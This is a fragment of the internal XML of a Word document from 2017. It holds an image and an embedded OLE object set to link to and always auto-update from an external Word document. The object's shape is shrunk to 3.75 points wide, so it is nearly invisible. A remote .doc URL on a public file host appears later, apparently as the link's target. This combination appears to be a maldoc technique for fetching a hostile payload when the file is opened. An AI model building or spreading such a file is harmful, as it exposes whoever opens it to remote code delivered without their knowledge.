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B10" w:rsidRDefault="00837B10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67.55pt;height:393.65pt">
            <v:imagedata r:id="rId6" o:title="23364921_1511926578843694_775562022_n"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="0065630E" w:rsidRDefault="0065630E"/>
    <w:p w:rsidR="00837B10" w:rsidRDefault="00837B10"/>
    <w:bookmarkStart w:id="0" w:name="_GoBack"/>
    <w:bookmarkEnd w:id="0"/>
    <w:p w:rsidR="00837B10" w:rsidRDefault="00837B10">
      <w:r>
        <w:object w:dxaOrig="9360" w:dyaOrig="11870">
          <v:shape id="_x0000_i1029" type="#_x0000_t75" style="width:3.75pt;height:446.05pt" o:ole="">
            <v:imagedata r:id="rId7" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Link" ProgID="Word.Document.8" ShapeID="_x0000_i1029" DrawAspect="Content" r:id="rId8" UpdateMode="Always">
            <o:LinkType>EnhancedMetaFile</o:LinkType>
            <o:LockedField>false</o:LockedField>
            <o:FieldCodes>\f 0</o:FieldCodes>
          </o:OLEObject>
        </w:object>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00837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43E8" w:rsidRDefault="00BA43E8" w:rsidP="00D33BF0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00BA43E8" w:rsidRDefault="00BA43E8" w:rsidP="00D33B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43E8" w:rsidRDefault="00BA43E8" w:rsidP="00D33BF0">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="00BA43E8" w:rsidRDefault="00BA43E8" w:rsidP="00D33B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EF6"/>
    <w:rsid w:val="0065630E"/>
    <w:rsid w:val="00837B10"/>
    <w:rsid w:val="009A6EF6"/>
    <w:rsid w:val="00BA43E8"/>
    <w:rsid w:val="00C422D1"/>
    <w:rsid w:val="00D3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7E6BA"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{E9DA08A6-B024-402C-A031-F3D62828C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3B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BF0"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00D33B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B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https://files.catbox.moe/hdzpmd.doc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2017-11-16T16:03:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-11-16T16:09:00Z</dcterms:modified>
</cp:coreProperties>
</file>